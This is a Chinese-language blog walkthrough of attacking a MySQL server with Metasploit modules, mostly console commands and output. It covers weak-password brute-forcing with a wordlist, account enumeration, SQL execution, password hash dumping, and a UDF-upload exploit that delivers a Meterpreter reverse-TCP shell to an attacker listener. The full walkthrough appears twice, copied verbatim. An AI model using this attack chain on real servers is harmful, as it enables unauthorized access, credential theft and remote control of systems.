msf关于mysql模块的详细利用

最新推荐文章于 2022-08-06 12:02:07 发布
最新推荐文章于 2022-08-06 12:02:07 发布
阅读量2.2k 收藏 4
点赞数
文章标签: mysql msf

1.确定版本
auxiliary/scanner/mysql/mysql_version    某些ip设置了指定的接入ip,可能没有接入权限

2.扫描弱口令
auxiliary/scanner/mysql/mysql_login
msf  auxiliary(mysql_login) > set USERNAME root
USERNAME => root
msf  auxiliary(mysql_login) > set PASS_FILE /pen/msf3/data/wordlists/postgres_default_pass.txt
PASS_FILE => /pen/msf3/data/wordlists/postgres_default_pass.txt
msf  auxiliary(mysql_login) > exploit

[+] 5.5.5.3:3306 - SUCCESSFUL LOGIN 'root' : '123456'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

查看结果:

msf  auxiliary(mysql_login) > creds
 
Credentials
===========
 
host     port  user  pass    type      active?
----     ----  ----  ----    ----      -------
5.5.5.3  3306  root  123456  password  true
 
[*] Found 1 credential.

 

3.查看数据库信息(需要有用户名和口令)
auxiliary/admin/mysql/mysql_enum
msf  auxiliary(mysql_enum) > show options

msf  auxiliary(mysql_enum) > set PASSWORD 123456
msf  auxiliary(mysql_enum) > set USERNAME root
msf  auxiliary(mysql_enum) > exploit
 
[*] Running MySQL Enumerator...
[*] Enumerating Parameters
[*]     MySQL Version: 5.5.16
[*]     Compiled for the following OS: Win32
[*]     Architecture: x86
[*]     Server Hostname: dis9team-a1
[*]     Data Directory: C:\xampp\mysql\data\
[*]     Logging of queries and logins: OFF
[*]     Old Password Hashing Algorithm OFF
[*]     Loading of local files: ON
[*]     Logins with old Pre-4.1 Passwords: OFF
[*]     Allow Use of symlinks for Database Files: YES
[*]     Allow Table Merge:
[*]     SSL Connection: DISABLED
[*] Enumerating Accounts:
[*]     List of Accounts with Password Hashes:
[*]         User: root Host: localhost Password Hash: *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[*]         User: root Host: 127.0.0.1 Password Hash:
[*]         User:  Host: localhost Password Hash:
[*]         User: pma Host: localhost Password Hash:
[*]         User: root Host: % Password Hash: *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[*]     The following users have GRANT Privilege:
[*]         User: root Host: localhost
[*]         User: root Host: 127.0.0.1
[*]         User: root Host: %
[*]     The following users have CREATE USER Privilege:
[*]         User: root Host: localhost
[*]         User: root Host: 127.0.0.1
[*]         User: root Host: %
[*]     The following users have RELOAD Privilege:
[*]         User: root Host: localhost
[*]         User: root Host: 127.0.0.1
[*]         User: root Host: %
[*]     The following users have SHUTDOWN Privilege:
[*]         User: root Host: localhost
[*]         User: root Host: 127.0.0.1
[*]         User: root Host: %
[*]     The following users have SUPER Privilege:
[*]         User: root Host: localhost
[*]         User: root Host: 127.0.0.1
[*]         User: root Host: %
[*]     The following users have FILE Privilege:
[*]         User: root Host: localhost
[*]         User: root Host: 127.0.0.1
[*]         User: root Host: %
[*]     The following users have PROCESS Privilege:
[*]         User: root Host: localhost
[*]         User: root Host: 127.0.0.1
[*]         User: root Host: %
[*]     The following accounts have privileges to the mysql database:
[*]         User: root Host: localhost
[*]         User: root Host: 127.0.0.1
[*]         User: root Host: %
[*]     Anonymous Accounts are Present:
[*]         User:  Host: localhost
[*]     The following accounts have empty passwords:
[*]         User: root Host: 127.0.0.1
[*]         User:  Host: localhost
[*]         User: pma Host: localhost
[*]     The following accounts are not restricted by source:
[*]         User: root Host: %
[*] Auxiliary module execution completed
msf  auxiliary(mysql_enum) >

 

4.执行语句
msf  auxiliary(mysql_enum) > use auxiliary/admin/mysql/mysql_sql
msf  auxiliary(mysql_sql) > show options
 
Module options (auxiliary/admin/mysql/mysql_sql):
 
msf  auxiliary(mysql_sql) > set PASSWORD 123456
PASSWORD => 123456
msf  auxiliary(mysql_sql) > set RHOST 5.5.5.3
RHOST => 5.5.5.3
msf  auxiliary(mysql_sql) > set USERNAME root
USERNAME => root
msf  auxiliary(mysql_sql) > exploit
 
[*] Sending statement: 'select version()'...
[*]  | 5.5.16 |
[*] Auxiliary module execution completed
msf  auxiliary(mysql_sql) >

5.导出HASH
msf  auxiliary(mysql_sql) > use auxiliary/scanner/mysql/mysql_hashdump
msf  auxiliary(mysql_hashdump) > show options
 
Module options (auxiliary/scanner/mysql/mysql_hashdump):
 
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        The password for the specified username
   RHOSTS                     yes       The target address range or CIDR identifier
   RPORT     3306             yes       The target port
   THREADS   1                yes       The number of concurrent threads
   USERNAME                   no        The username to authenticate as
 
msf  auxiliary(mysql_hashdump) > set PASSWORD 123456
PASSWORD => 123456
smsf  auxiliary(mysql_hashdump) > set USERNAME root
USERNAME => root
msf  auxiliary(mysql_hashdump) > set RHOSTS 5.5.5.3
RHOSTS => 5.5.5.3
msf  auxiliary(mysql_hashdump) > exploit
 
[+] Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] Saving HashString as Loot: root:
[+] Saving HashString as Loot: :
[+] Saving HashString as Loot: pma:
[+] Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] Saving HashString as Loot: dis9team:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[*] Hash Table has been saved: /home/brk/.msf4/loot/20120312075809_default_5.5.5.3_mysql.hashes_864135.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf  auxiliary(mysql_hashdump) >

 

7.权限提升
msf  auxiliary(mysql_login) > use exploit/windows/mysql/mysql_payload
msf  exploit(mysql_payload) > set RHOST 5.5.5.3
RHOST => 5.5.5.3
msf  exploit(mysql_payload) > show options
 
Module options (exploit/windows/mysql/mysql_payload):
 
   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   FORCE_UDF_UPLOAD  false            no        Always attempt to install a sys_exec() mysql.function.
   PASSWORD                           no        The password for the specified username
   RHOST             5.5.5.3          yes       The target address
   RPORT             3306             yes       The target port
   USERNAME          root             no        The username to authenticate as
 
Payload options (windows/meterpreter/reverse_tcp):
 
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST     5.5.5.1          yes       The listen address
   LPORT     4444             yes       The listen port
 
Exploit target:
 
   Id  Name
   --  ----
   0   Automatic
 
msf  exploit(mysql_payload) > set PASSWORD 123456
PASSWORD => 123456
msf  exploit(mysql_payload) > exploit
[*] Started reverse handler on 5.5.5.1:4444
[*] Checking target architecture...
[*] Checking for sys_exec()...
[*] Checking target architecture...
[*] Checking for MySQL plugin directory...
[*] Target arch (win32) and target path both okay.
[*] Uploading lib_mysqludf_sys_32.dll library to C:/xampp/mysql/lib/plugin/CHlQoqQu.dll...
[*] Checking for sys_exec()...
[*] Command Stager progress -  10.26% done (10493/102246 bytes)
[*] Command Stager progress -  30.79% done (31479/102246 bytes)
[*] Command Stager progress -  80.63% done (82445/102246 bytes)
[*] Command Stager progress - 100.00% done (102246/102246 bytes)
msf  exploit(mysql_payload) > sessions
 
Active sessions
===============
 
No active sessions.
 
msf  exploit(mysql_payload) >

 

ySQL password hashdump (mysql_hashdump)
如下命令可调用这个模块:
msf > use auxiliary/scanner/mysql/mysql_hashdump
RHOST:目标IP(可以是单个IP,也可以是一个网段192.168.1.0-192.168.1.255 or 192.168.1.0/24,当然文件形式也可以file:/tmp/ip_addresses.txt)
THREADS:线程数
USERNAME:用户名
PASSWORD:密码
 
MySQL enumeration (mysql_enum)
如下命令可调用这个模块:
msf > use auxiliary/admin/mysql/mysql_enum
这个模块可以读取mysql服务器的相关信息,如
•     The MySQL version
•     The MySQL OS compilation target
•     The server architecture
•     The server hostname
•     The MySQL datas directory location
•     If logging of queries and logins is activated or not, and log files location
•     If the old password hashing algorithm support is activated or not
•     If local files loading (infile) is activated or not
•     If logins with old Pre-4.1 passwords is authorized or not
 
MySQL Authbypass(mysql_authbypass_hashdump)
如下命令可调用这个模块:
  
msf > use auxiliary/admin/mysql/mysql_authbypass_hashdump

 

 1.确定版本
auxiliary/scanner/mysql/mysql_version    某些ip设置了指定的接入ip,可能没有接入权限

2.扫描弱口令
auxiliary/scanner/mysql/mysql_login
msf  auxiliary(mysql_login) > set USERNAME root
USERNAME => root
msf  auxiliary(mysql_login) > set PASS_FILE /pen/msf3/data/wordlists/postgres_default_pass.txt
PASS_FILE => /pen/msf3/data/wordlists/postgres_default_pass.txt
msf  auxiliary(mysql_login) > exploit

[+] 5.5.5.3:3306 - SUCCESSFUL LOGIN 'root' : '123456'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

查看结果:

msf  auxiliary(mysql_login) > creds
 
Credentials
===========
 
host     port  user  pass    type      active?
----     ----  ----  ----    ----      -------
5.5.5.3  3306  root  123456  password  true
 
[*] Found 1 credential.

 

3.查看数据库信息(需要有用户名和口令)
auxiliary/admin/mysql/mysql_enum
msf  auxiliary(mysql_enum) > show options

msf  auxiliary(mysql_enum) > set PASSWORD 123456
msf  auxiliary(mysql_enum) > set USERNAME root
msf  auxiliary(mysql_enum) > exploit
 
[*] Running MySQL Enumerator...
[*] Enumerating Parameters
[*]     MySQL Version: 5.5.16
[*]     Compiled for the following OS: Win32
[*]     Architecture: x86
[*]     Server Hostname: dis9team-a1
[*]     Data Directory: C:\xampp\mysql\data\
[*]     Logging of queries and logins: OFF
[*]     Old Password Hashing Algorithm OFF
[*]     Loading of local files: ON
[*]     Logins with old Pre-4.1 Passwords: OFF
[*]     Allow Use of symlinks for Database Files: YES
[*]     Allow Table Merge:
[*]     SSL Connection: DISABLED
[*] Enumerating Accounts:
[*]     List of Accounts with Password Hashes:
[*]         User: root Host: localhost Password Hash: *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[*]         User: root Host: 127.0.0.1 Password Hash:
[*]         User:  Host: localhost Password Hash:
[*]         User: pma Host: localhost Password Hash:
[*]         User: root Host: % Password Hash: *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[*]     The following users have GRANT Privilege:
[*]         User: root Host: localhost
[*]         User: root Host: 127.0.0.1
[*]         User: root Host: %
[*]     The following users have CREATE USER Privilege:
[*]         User: root Host: localhost
[*]         User: root Host: 127.0.0.1
[*]         User: root Host: %
[*]     The following users have RELOAD Privilege:
[*]         User: root Host: localhost
[*]         User: root Host: 127.0.0.1
[*]         User: root Host: %
[*]     The following users have SHUTDOWN Privilege:
[*]         User: root Host: localhost
[*]         User: root Host: 127.0.0.1
[*]         User: root Host: %
[*]     The following users have SUPER Privilege:
[*]         User: root Host: localhost
[*]         User: root Host: 127.0.0.1
[*]         User: root Host: %
[*]     The following users have FILE Privilege:
[*]         User: root Host: localhost
[*]         User: root Host: 127.0.0.1
[*]         User: root Host: %
[*]     The following users have PROCESS Privilege:
[*]         User: root Host: localhost
[*]         User: root Host: 127.0.0.1
[*]         User: root Host: %
[*]     The following accounts have privileges to the mysql database:
[*]         User: root Host: localhost
[*]         User: root Host: 127.0.0.1
[*]         User: root Host: %
[*]     Anonymous Accounts are Present:
[*]         User:  Host: localhost
[*]     The following accounts have empty passwords:
[*]         User: root Host: 127.0.0.1
[*]         User:  Host: localhost
[*]         User: pma Host: localhost
[*]     The following accounts are not restricted by source:
[*]         User: root Host: %
[*] Auxiliary module execution completed
msf  auxiliary(mysql_enum) >

 

4.执行语句
msf  auxiliary(mysql_enum) > use auxiliary/admin/mysql/mysql_sql
msf  auxiliary(mysql_sql) > show options
 
Module options (auxiliary/admin/mysql/mysql_sql):
 
msf  auxiliary(mysql_sql) > set PASSWORD 123456
PASSWORD => 123456
msf  auxiliary(mysql_sql) > set RHOST 5.5.5.3
RHOST => 5.5.5.3
msf  auxiliary(mysql_sql) > set USERNAME root
USERNAME => root
msf  auxiliary(mysql_sql) > exploit
 
[*] Sending statement: 'select version()'...
[*]  | 5.5.16 |
[*] Auxiliary module execution completed
msf  auxiliary(mysql_sql) >

5.导出HASH
msf  auxiliary(mysql_sql) > use auxiliary/scanner/mysql/mysql_hashdump
msf  auxiliary(mysql_hashdump) > show options
 
Module options (auxiliary/scanner/mysql/mysql_hashdump):
 
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        The password for the specified username
   RHOSTS                     yes       The target address range or CIDR identifier
   RPORT     3306             yes       The target port
   THREADS   1                yes       The number of concurrent threads
   USERNAME                   no        The username to authenticate as
 
msf  auxiliary(mysql_hashdump) > set PASSWORD 123456
PASSWORD => 123456
smsf  auxiliary(mysql_hashdump) > set USERNAME root
USERNAME => root
msf  auxiliary(mysql_hashdump) > set RHOSTS 5.5.5.3
RHOSTS => 5.5.5.3
msf  auxiliary(mysql_hashdump) > exploit
 
[+] Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] Saving HashString as Loot: root:
[+] Saving HashString as Loot: :
[+] Saving HashString as Loot: pma:
[+] Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] Saving HashString as Loot: dis9team:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[*] Hash Table has been saved: /home/brk/.msf4/loot/20120312075809_default_5.5.5.3_mysql.hashes_864135.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf  auxiliary(mysql_hashdump) >

 

7.权限提升
msf  auxiliary(mysql_login) > use exploit/windows/mysql/mysql_payload
msf  exploit(mysql_payload) > set RHOST 5.5.5.3
RHOST => 5.5.5.3
msf  exploit(mysql_payload) > show options
 
Module options (exploit/windows/mysql/mysql_payload):
 
   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   FORCE_UDF_UPLOAD  false            no        Always attempt to install a sys_exec() mysql.function.
   PASSWORD                           no        The password for the specified username
   RHOST             5.5.5.3          yes       The target address
   RPORT             3306             yes       The target port
   USERNAME          root             no        The username to authenticate as
 
Payload options (windows/meterpreter/reverse_tcp):
 
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST     5.5.5.1          yes       The listen address
   LPORT     4444             yes       The listen port
 
Exploit target:
 
   Id  Name
   --  ----
   0   Automatic
 
msf  exploit(mysql_payload) > set PASSWORD 123456
PASSWORD => 123456
msf  exploit(mysql_payload) > exploit
[*] Started reverse handler on 5.5.5.1:4444
[*] Checking target architecture...
[*] Checking for sys_exec()...
[*] Checking target architecture...
[*] Checking for MySQL plugin directory...
[*] Target arch (win32) and target path both okay.
[*] Uploading lib_mysqludf_sys_32.dll library to C:/xampp/mysql/lib/plugin/CHlQoqQu.dll...
[*] Checking for sys_exec()...
[*] Command Stager progress -  10.26% done (10493/102246 bytes)
[*] Command Stager progress -  30.79% done (31479/102246 bytes)
[*] Command Stager progress -  80.63% done (82445/102246 bytes)
[*] Command Stager progress - 100.00% done (102246/102246 bytes)
msf  exploit(mysql_payload) > sessions
 
Active sessions
===============
 
No active sessions.
 
msf  exploit(mysql_payload) >

 

ySQL password hashdump (mysql_hashdump)
如下命令可调用这个模块:
msf > use auxiliary/scanner/mysql/mysql_hashdump
RHOST:目标IP(可以是单个IP,也可以是一个网段192.168.1.0-192.168.1.255 or 192.168.1.0/24,当然文件形式也可以file:/tmp/ip_addresses.txt)
THREADS:线程数
USERNAME:用户名
PASSWORD:密码
 
MySQL enumeration (mysql_enum)
如下命令可调用这个模块:
msf > use auxiliary/admin/mysql/mysql_enum
这个模块可以读取mysql服务器的相关信息,如
•     The MySQL version
•     The MySQL OS compilation target
•     The server architecture
•     The server hostname
•     The MySQL datas directory location
•     If logging of queries and logins is activated or not, and log files location
•     If the old password hashing algorithm support is activated or not
•     If local files loading (infile) is activated or not
•     If logins with old Pre-4.1 passwords is authorized or not
 
MySQL Authbypass(mysql_authbypass_hashdump)
如下命令可调用这个模块:
  
msf > use auxiliary/admin/mysql/mysql_authbypass_hashdump

爱上卿Ooo
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
msf --攻击MySQL 和简单实用
代码审计
04-21 4231
msfdb run(可以自动链接数据库) hosts services use auxiliary/scanner/mysql/mysql_version set PASS_FILE /home/kali/Desktop/yui.txt set exploit 步骤 mysql 爆破 root 密码 mysql_udf 上传udf mysql_sql 将执行的语句进行hex ...
msfmysql 利用
ShadowAssassin的专栏
12-05 2472
1.确定版本 auxiliary/scanner/mysql/mysql_version    某些ip设置了指定的接入ip,可能没有接入权限 2.扫描弱口令 auxiliary/scanner/mysql/mysql_login msf  auxiliary(mysql_login) > set USERNAME root USERNAME => root msf  auxili
实战-msf扫描靶机上mysql服务空密码
保持微笑的博客
01-15 1213
靶机的安装我们在上面的文章里讲解过了。 操作流程: kali系统的IP是192.168.0.109。启动一台Metasploitable2-Linux靶机,网络模式设置为桥接。 登录Metasploitable2-Linux系统用户名root,密码:root 查看靶机的ip 因为要查找的是mysql的空密码,涉及到登陆问题。我们可以去查找login。 加载模块 查看需要设置的参数 设置目标主机 设置目标账号 查看 BLANK_PASSWORDS 是否...
msf攻击Mysql服务.docx
04-26
本文详细介绍了通过msfMySQL服务器进行攻击的过程,文中列出了每一个步骤,并详细列出了使用的命令。
msf连接mysql_Metasploit学习之msf连接数据库
weixin_34511324的博客
01-21 188
解决Docker容器时区及时间不同步问题今天在系统集成测试时由测试人员提交了一个测试bug,原因是提交业务数据时间与实际时间(北京时间)有偏差,导致统计异常.由于我们集成测试是向测试人员直接提供完整的Docker镜像作为测试环境,原因应该是 ...css旋转翻转180度 /* entire container, keeps perspective */ .flip-container { pers...
MSF实战——MySQL空密码的危害
永远是少年
06-05 485
今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF实战渗透测试MySQL空密码扫描。 一、MSF模块选择 二、MSF参数设定 三、MSF执行与结果
第二十四课:基于MSF发现内网存活主机第二季.docx
09-15
5. `auxiliary/scanner/mysql/mysql_version` - MySQL版本扫描模块检测MySQL数据库服务器的版本信息。 以`auxiliary/scanner/ssh/ssh_version`为例,我们详细探讨如何使用这个模块发现SSH服务。在MSF中,我们首先...
第二十七课:基于MSF发现内网存活主机第五季.docx
09-15
MSF提供了多种扫描器模块,用于通过不同协议和服务来确定网络上的活动系统。 首先,我们回顾一下前四个季节中介绍的扫描模块: 第一季: 1. `auxiliary/scanner/discovery/arp_sweep` - 这个模块用于通过ARP协议...
第二十五课:基于MSF发现内网存活主机第三季1
08-03
在本课程中,我们将深入探讨如何使用Metasploit框架(MSF)进行内网存活主机的发现。Metasploit是一款广泛使用的开源安全测试工具,它包含了大量的扫描器模块,可以帮助安全专家和渗透测试人员识别网络中的活动主机...
第二十八课:基于MSF发现内网存活主机第六季1
08-03
4. `auxiliary/scanner/dns/dns_amp`:DNS AMP(放大攻击)模块利用DNS查询来探测主机,并可能用于DNS反射攻击。 5. `auxiliary/scanner/mysql/mysql_version`:此模块扫描MySQL数据库服务,获取其版本信息,有助于...
No Session错误
qq_40295647的博客
06-19 567
No Session错误 ​ No Seesion:没有会话,Session是Hibernate与数据库之间的会话 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-YTuOoHLT-1592552822731)(C:\Users\Administrator\AppData\Roaming\Typora\typora-user-images\1592552690920.png)] 解决方案:将打开EntityManager的时机提前,将关闭EntityManager的时机延后.
iscsi网络存储介绍及客户端配置操作
weixin_33961829的博客
04-29 419
本文不介绍iSCSI服务端的搭建过程,不然就会很累赘。主题就是怎么去完成iscsi网络存储的挂载过程,并顺带介绍一些必要的概念。 1. iscsi介绍与initiator安装 1.1 iSCSI介绍 iSCSI简单来说,就是把SCSI指令通过TCP/IP协议封装起来,在以太网中传输。iSCSI 可以实现在IP网络上传递和运行SCSI...
【kali-漏洞利用】(3.4)Metasploit渗透攻击应用:MySQL渗透过程
08-06 2508
【kali-漏洞利用】应用渗透攻击过程
mysql弱口令msf_Metasploit扫描Mysql弱口令
weixin_28818721的博客
01-19 228
msf > db_connect -y /opt/metasploit/apps/pro/ui/config/database.yml msf连接数据库[*] Rebuilding the module cache in the background...msf > db_status 查看数据库连接状态[*] postgresql connected to msf3msf &g...
网络安全kali渗透学习 web渗透入门 使用msf扫描靶机上mysql服务的空密码
xueshenlaila的博客
03-02 3222
我们启动一台Metasploitable2-Linux靶机网络模式为桥接IP:192.168.1.180
msf攻击mysql_authbypass_hashdump漏洞
每天累计一滴水 十天后变成一大滴水 一百天后变成一杯水
10-06 779
我是用的是vulhub进行漏洞环境搭建,具体怎么搭建我在这儿就不说了,我主要讲下如果使用msf进行攻击的,过程相当简单~~~
limit active sessions
cuanjiong0688的博客
12-16 464
Normal 0 7.8 磅 0 2 false false false ...
浅谈抓取session信息脚本
iongzhidun1的博客
05-20 1151
关于session的诊断,可以基于动态性能视图,ash,awr.. 自己也写过一些简单的脚本,在平时的工作中也能够完成一些基本的工作。今天在看taner分享的脚本snapper的时候,让自己眼前一亮,也发现自己存在着很多的不足的地方。 可以从脚本中看到他孜孜不倦的分享着自己的心得,而且自己也写了一些更加深入的一些工具集来解析oracle的技术细节。 脚本的功能很多,林林总总下来代码有近200
[WEB安全]MySQl提权 mof、udf过程详解
网络安全知识分享
12-17 3189
MySQL提权〇、Mysql提权的必备条件1、Mysql密码查询2、利用ntfs特性创建文件夹3、常用的sql基础查询命令一、mof提权0、环境搭建1、原理2、条件3、开始4、删号二、UDF提权0、原理1、步骤2、实操 〇、Mysql提权的必备条件 Mysql的服务没有降权,并且需要获取Mysql root账号密码 使用net user命令查看系统当前帐号,如果出现Mysql这类用户,则系统可能进行了降权 1、Mysql密码查询 1、root密码查询 # MySQL <= 5.6 版本 selec
详细介绍 msf监听模块
最新发布
06-06
Msf监听模块是Metasploit框架中的一个重要模块,用于在目标系统上启动一个监听器,以便漏洞利用或后门程序可以与攻击者的系统进行通信。Msf监听模块可以根据不同的协议和端口设置来创建不同类型的监听器,例如TCP、UDP、HTTP、HTTPS等。 在Metasploit框架中,msf监听模块通常用于创建反向Shell或Meterpreter会话,这些会话可以提供对目标系统的完全控制,包括文件系统访问、系统命令执行、远程桌面控制等。此外,msf监听模块还可以与msf漏洞利用模块结合使用,利用漏洞并在目标系统上创建一个监听器,以便攻击者可以获得对目标系统的控制。 总之,msf监听模块是Metasploit框架中非常重要的一个模块,它允许攻击者在目标系统上创建一个监听器并与其进行通信,从而获得对目标系统的控制。但是,请注意,使用msf监听模块进行非法攻击是违法行为,必须遵守当地法律法规。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值